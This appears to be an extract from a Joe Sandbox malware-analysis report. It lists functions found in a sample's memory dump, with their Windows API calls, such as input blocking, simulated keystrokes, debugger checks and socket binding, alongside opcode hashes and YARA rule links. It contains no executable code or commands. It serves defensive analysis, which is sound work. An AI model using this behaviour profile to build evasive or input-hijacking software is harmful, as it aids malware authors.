                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3008561057-0
                                                                                                                                                                                                                                  • Opcode ID: f3959b7a91577af97fdca7f4be1797ab215c1f0a1068df814959d401ca880b09
                                                                                                                                                                                                                                  • Instruction ID: 2534629fabc0a834a1a9fdb7abefdce9eb06174030ca23cf08c2bd9dc454143b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3959b7a91577af97fdca7f4be1797ab215c1f0a1068df814959d401ca880b09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3111AC72600209EFDB20DBA8DC09BBE7BB9EF45355F244528EA4697120C7359D42CBA4
                                                                                                                                                                                                                                  Function 00A0A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A0A5BD
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A0A6D0
                                                                                                                                                                                                                                    • Part of subcall function 00A042B9: GetInputState.USER32 ref: 00A04310
                                                                                                                                                                                                                                    • Part of subcall function 00A042B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A043AB
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A0A5ED
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A0A6BA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                  • Opcode ID: e8d5da03dd22cde29b18c31d43e49069a93c51ec862230b54994b5f0c167580c
                                                                                                                                                                                                                                  • Instruction ID: 09301c5958ce246d3db2bec8499a4d9ac48fd8d03529f935c4fa8c58269f030a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8d5da03dd22cde29b18c31d43e49069a93c51ec862230b54994b5f0c167580c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89414E7190020EAFCF14DFA8ED49AEEBBB8BF55310F244065E805A21D1EB319E85CB61
                                                                                                                                                                                                                                  Function 009922AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,?), ref: 0099233E
                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00992421
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00992434
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$Proc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 929743424-0
                                                                                                                                                                                                                                  • Opcode ID: a38043a7a9140a5b58f51f80d616ac2a5356486828d57dcbdefff2d2394da757
                                                                                                                                                                                                                                  • Instruction ID: 5ee9588a67c0a99d8bc47ef7eddadcfad25f6898a3c220f0c3130d20832d4619
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a38043a7a9140a5b58f51f80d616ac2a5356486828d57dcbdefff2d2394da757
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40817AF0144910BEEE28B73C4D9AE7F255EEB86B01F11851AF102CA696C95D8F029273
                                                                                                                                                                                                                                  Function 00A12263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A13AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
                                                                                                                                                                                                                                    • Part of subcall function 00A13AAB: _wcslen.LIBCMT ref: 00A13AF8
                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A122BA
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A122E1
                                                                                                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00A12338
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A12343
                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00A12372
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1601658205-0
                                                                                                                                                                                                                                  • Opcode ID: a1412bc358c4f3cceb4b32970601f2dcef2d054fafea8885b20c1fa654de9cc7
                                                                                                                                                                                                                                  • Instruction ID: d92802e9c198d287c204ed48d237812a4fbe8b7e6f7d6c6d02888fd6f65f214d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1412bc358c4f3cceb4b32970601f2dcef2d054fafea8885b20c1fa654de9cc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1051B475A00200AFEB10EF68C886F6A77E5AB45714F04805CF9559F3D3CA75ED428BE1
                                                                                                                                                                                                                                  Function 00A226DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                                                                                                  • Opcode ID: 01a70c7ac2b28053c14f3e706ee11bf5b9e878db57dd0a0d9b4205a50028cfb3
                                                                                                                                                                                                                                  • Instruction ID: 88a244fe101266a2e544c0b040b24ef830914620043e046b43f8733da3e1bd4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01a70c7ac2b28053c14f3e706ee11bf5b9e878db57dd0a0d9b4205a50028cfb3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C21F431704220AFD7209F2EE844B6A7BE5EF85314F188079E8498B252DB71ED43CB90
                                                                                                                                                                                                                                  Function 009EE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                  • String ID: %.3d$X64
                                                                                                                                                                                                                                  • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                  • Opcode ID: 6302a93d7524acc765062d4b0679bddfca36a3a268067b3c4399fd6e894158a4
                                                                                                                                                                                                                                  • Instruction ID: d79abbdcc5388dd315cc6c90f5ae6f507366d9f3030af8bec0eae01f6b977a00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6302a93d7524acc765062d4b0679bddfca36a3a268067b3c4399fd6e894158a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93D012B1C04148E6CBD1D7919C88DB9737CBB18B01F204C62F906A1010E6389D089721
                                                                                                                                                                                                                                  Function 009C2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 009C2A8A
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 009C2A94
                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 009C2AA1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                  • Opcode ID: 4c2d4fa4d2b4036f39efa538417a0b26138009f81dc049bda4978eedc8c6d570
                                                                                                                                                                                                                                  • Instruction ID: c67956e63da5990dc52ed3036a8641c0ee3ccc48b453169e19084af89340a878
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2d4fa4d2b4036f39efa538417a0b26138009f81dc049bda4978eedc8c6d570
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D319775D013189BCB21DF68D989BDDBBB8AF48310F5041EAE41CA6291E7709F858F45
                                                                                                                                                                                                                                  Function 009EE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 009EE664
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                                                                                  • String ID: X64
                                                                                                                                                                                                                                  • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                  • Opcode ID: bd54d033d04f9476b59e697a7db74827f28d0fa2736c015dfbec2896b7f9324b
                                                                                                                                                                                                                                  • Instruction ID: e1d76165269ad6fdc22bf20de6300eb36be1506b5ff04c5cc0b54e3359c8601d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd54d033d04f9476b59e697a7db74827f28d0fa2736c015dfbec2896b7f9324b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96D0C9B580511DEADF90CB90ECC8DD973BCBB04304F100A61F106A2010D73495498B14
                                                                                                                                                                                                                                  Function 00A041FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A152EE,?,?,00000035,?), ref: 00A04229
                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A152EE,?,?,00000035,?), ref: 00A04239
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                                                                                                                  • Opcode ID: e7a7f0a72f0be50a17211a3fcd8c062029f47793f7c1acb41c0780dd05e9a394
                                                                                                                                                                                                                                  • Instruction ID: ac09bb43b2eebc29785d082a201b5d32f6316b168b678e85281b6ad9588add18
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7a7f0a72f0be50a17211a3fcd8c062029f47793f7c1acb41c0780dd05e9a394
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F0A0707002286AEB2097A9AC4DFEB366DEFC9761F100275B605D2281DA709901C6B0
                                                                                                                                                                                                                                  Function 009FBBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009FBC24
                                                                                                                                                                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 009FBC37
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                                                                                                                  • Opcode ID: 1c510770bd215d713d62ecdf71b7b0d65db13abaa5d50baa0172bd53a359a322
                                                                                                                                                                                                                                  • Instruction ID: 3a130586e2afeed6ceff00f28616c4d43333a6a81f49686ff40f648cd5a6daf2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c510770bd215d713d62ecdf71b7b0d65db13abaa5d50baa0172bd53a359a322
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABF06D7080024DABDB01DFA4C806BBF7BB4FF04309F148419FA51A5192C37D8202DF94
                                                                                                                                                                                                                                  Function 00A0F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • BlockInput.USER32(00000001), ref: 00A0F51A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                                                                                                                  • Opcode ID: f5a112b9bdc8973bc8da1d15afc807ee3c0532ac6b27b823e94b03d0804be443
                                                                                                                                                                                                                                  • Instruction ID: 849ef84f347d02702ef0149c2f5345f770f3a79a5e7493271019bb17949e1ad2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5a112b9bdc8973bc8da1d15afc807ee3c0532ac6b27b823e94b03d0804be443
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89E048312102049FDB20DF6DE804E56F7E8BFA4761F008425F84AD7351D670F9418B90
                                                                                                                                                                                                                                  Function 009FEC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 009FECC7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                                                                                                                  • Opcode ID: 77441843f73617bbaa2adc406632e21aa5e1e099b1c4f0b9235db5f6e027b655
                                                                                                                                                                                                                                  • Instruction ID: 732eec5d720c5ab6d08e1d03003f45d310ab6106d23f9df79c21c2bb850aa8eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77441843f73617bbaa2adc406632e21aa5e1e099b1c4f0b9235db5f6e027b655
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5D05EBE19420838E82D4B3C8E2FB76260DE701741F988A59B382C96F9E5D59901A221
                                                                                                                                                                                                                                  Function 009B0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,009B075E), ref: 009B0D4A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                  • Opcode ID: f65eee34e6184a65e0fd27f779edc74b321097dd725d9479294656444ca315bc
                                                                                                                                                                                                                                  • Instruction ID: a132f72cec56e1cf44e65a7226d9cc992b8b7e1a8acb1f847b0d5b1494532371
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65eee34e6184a65e0fd27f779edc74b321097dd725d9479294656444ca315bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 00A1353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A1358D
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A135A0
                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00A135AF
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00A135CA
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00A135D1
                                                                                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A13700
                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A1370E
